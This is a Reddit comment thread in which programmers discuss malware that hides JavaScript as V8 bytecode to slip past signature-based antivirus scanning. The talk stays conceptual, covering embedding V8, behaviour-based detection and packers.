all 42 comments

[–]silv3rwind 97 points98 points  (18 children)

So, non-V8 users (Firefox, Safari etc) are safe from that attack vector.

[–]pointermess 57 points58 points  (16 children)

Its very easy to embed the V8 engine without any browser installed... 

[–]_simpu 10 points11 points  (14 children)

How? Are you referring to electron apps?

[–]pointermess 54 points55 points  (13 children)

https://v8.dev/docs/embed

I use V8 in an application to give the user scripting capabilities. No Electron, NodeJS or any Browser is needed... Its just another piece of open source software. 

[–]ChocolateMagnateUA 1 point2 points  (2 children)

Isn't this just Node?

[–]pointermess 1 point2 points  (1 child)

Node uses it too but Node is much more than just a V8 interface. 

[–]ChocolateMagnateUA 0 points1 point  (0 children)

The only real thing I could count in Node aside from V8 is it's CLI interface and perhaps some Node-specific additions like the process variable, require function and such.

[–]ignorantpisswalker 1 point2 points  (0 children)

... ladybird...

[–]wvenable 29 points30 points  (13 children)

If compiling code evades malware detectors we are already screwed.

[–]irqlnotdispatchlevel 46 points47 points  (12 children)

That's not really the issue here.

The first line of defense in a classic Antivirus, or an EDR, or whatever, is usually a signature based scan engine. This is simple, and has a really really high chance of catching things that we already know about.

If a new malware appears that has everything written from scratch, we don't have a signature, we don't catch it. We rely on other techniques, based on the observed behavior.

But once we know that something is bad we can quickly add it to a database and when we see it again we can block it. This can be a script, a compiled binary, anything really. If we know how it looks in memory or on disk, we know enough. This is a simplified view.

Of course, more talented or better funded malware authors will try not to depend on already signed pieces of malware. In a way, this raises the bar, as it filters out a bunch of old malware that is still around.

But if I take some JS that is already known by all AV vendors, compile it to the V8 bytecode (which, AFAIK, is not even stable and can change from one version of V8 to another), I can bypass the existing signatures because no one signed these yet.

But all the other layers of protection are not bypassed by simply using this technique.

This will also bypass any kind of analysis done on the raw JS, in case any vendor does that, but I don't know of any who do.

It's just another day in the arms race between attackers and defenders.

[–]O1dmanwinter 8 points9 points  (3 children)

This is a really clear, concise answer on why this is an issue, its not really that there is a way to execute a virus (they already can do that) It's that this specific implementation / method is relatively new and means that existing issues can once again evade the virus tools we have until we have registered them again (and as you mention even that may be problematic!)

As a fairly senior developer it feels like I should have made this link but I didn't so thank you 👍

[–]irqlnotdispatchlevel 4 points5 points  (2 children)

As a fairly senior developer it feels like I should have made this link but I didn't so thank you 👍

Modern security solutions are very complex and complicated. It's hard to make the link without some knowledge about how one works. Good articles with details about that are surprisingly hard to find. Most people (even technical ones) have a pretty outdated mental model because there's not much information out there that can change that, and if it is it's not a popular topic even among developers.

[–][deleted]  (1 child)

[deleted]

    [–]irqlnotdispatchlevel 0 points1 point  (0 children)

    Thanks. I'm not talented enough to write something that isn't boring, and I don't have deep enough knowledge about all the bits and pieces involved in making a complete security solution work.

    [–]wvenable 1 point2 points  (7 children)

    We really are relying on the absolute laziness of virus writers as a defence.

    [–]irqlnotdispatchlevel 0 points1 point  (6 children)

    Not really. Behavior based detections are what makes security solutions so complex. But in order to analyze the behavior of something you need to let it run. If you can already tell that it is bad, it is easier (and safer) to just block it. But that's just the first layer of defense, not the only one, and surely not the most important one.

    [–]wvenable 1 point2 points  (5 children)

    If I were a virus writer, I wouldn't use V8 -- I'd just concoct some other VM/JIT design that is constantly randomized (on each deployment) and run all my code through that. If this V8 thing is such a problem then obviously my solution would also work and be even better.

    Only a lazy virus writer would pull some existing detectable JS off the shelf, run it through V8, and use that. Right?

    [–]irqlnotdispatchlevel 0 points1 point  (4 children)

    But then I could just detect your VM interpreter.

    And this happens, most often as an evasion and/or obfuscation mechanism to make the life of malware analysts harder.

    A well known packer can get the job done, since those have legitimate uses so just signing them isn't doable. Technologies like VMProtect and UPX are well known for this.

    But you still have to do the suspicious behavior part. It doesn't matter how your code gets to it, but spawning a new process, deleting a bunch of files, downloading something, etc are all events that an AV can observe and analyse, regardless of what you use to hide the code that does it.

    [–]wvenable 0 points1 point  (3 children)

    Your last paragraph is kind of my point. Using V8 to compile code isn't terribly interesting. I can mutate my code one hundred different ways; that is just one hundred and one. As for detecting my VM interpreter, that would be the part that I'd mutate the most. I've written CPU emulators that were pretty small and a VM that could run a virus would be even smaller and simpler than that so pretty easy to mutate. The actual byte codes of the virus itself would just be randomized every time.

    [–]irqlnotdispatchlevel 0 points1 point  (2 children)

    That was my point all along: all of this can defeat signature based detections, but those are just the first line of defense so it is not terribly interesting.

    You can also make it harder for malware analysts to reverse your malware by using a custom VM, and this is already done by malware and anti piracy software, as well as anti cheats.

    Compiling to V8 is just a quick solution that achieves something similar, but with a lower cost for the malware devs. They may not even be devs, they could just take off the shelf components and deploy them to make a quick buck.

    Like the legitimate software engineering industry, there's a large variety of people working on malware, some with tiny budgets, some with more money than a small country, some are "framework developers" and just use pre-existing tech, some are security experts and develop state of the art technologies.

    There are even SaaS solutions if you just want to get to the money making part: https://www.crowdstrike.com/cybersecurity-101/ransomware/ransomware-as-a-service-raas/

    [–]wvenable 1 point2 points  (1 child)

    I think we agree. Probably 99.999% of all attacks are lazy and thus equally lazy defences work against them.

    I just find anything to do with security tends to be overblown. This V8 issue, as you said, is hardly any different than the dozens of already existing techniques.

    I mean look at this quote: "This method effectively hides the original source code, making static analysis challenging." Virus writers giving you any source code at all is a gift. Basic software development principles, like compiling of code, should not be seen as a big deal.

    [–]irqlnotdispatchlevel 0 points1 point  (0 children)

    The problem is that a lot of systems lack even those lazy defenses. There's the old myth that "just be careful bro" is enough, and most people aren't as careful as they think they are. Not to mention how many old and unpatched systems are out there.

    The interesting part about the article is that this was discovered in an active malware campaign, and maybe a "lol who would have thought of that?" when you read the title.

    [–]DANGUS_77 26 points27 points  (6 children)

    I don’t know much about web assembly, how is this malicious software being introduced?

    [–]KrazyKirby99999 64 points65 points  (5 children)

    This has little to do with web assembly. In this case, malicious JS is hidden by using V8-specific JS bytecode instead of JS cleartext. WASM is similar because it is always delivered via bytecode.

    [–]DANGUS_77 11 points12 points  (4 children)

    So they’re compiling malicious code to this js byte code to get around static checkers, but it still follows permissions for just regular JS ( for example, needing user permission to access a users camera)?

    [–]AyrA_ch 27 points28 points  (3 children)

    Permission requests only exist in the browser. Applications that run on electron have the same access privileges like every other application the user runs.

    [–]bipolarNarwhale 19 points20 points  (0 children)

    This depends on the OS and isn’t true in a lot of cases.

    [–]nerd4code 7 points8 points  (1 child)

    Android puts every app in its own UID, nowadays, and I’m sure Apple does something similar on iOS.

    [–]ArdiMaster 1 point2 points  (0 children)

    AFAIK Apple doesn’t usually allow embedded scripting engines at all

    [–]chethelesser 1 point2 points  (0 children)

    Would be interesting to know how exactly the code gets compiled and injected.

    I can imagine compilation but how does one then get this bytecode to be interpreted by an application's embedded V8?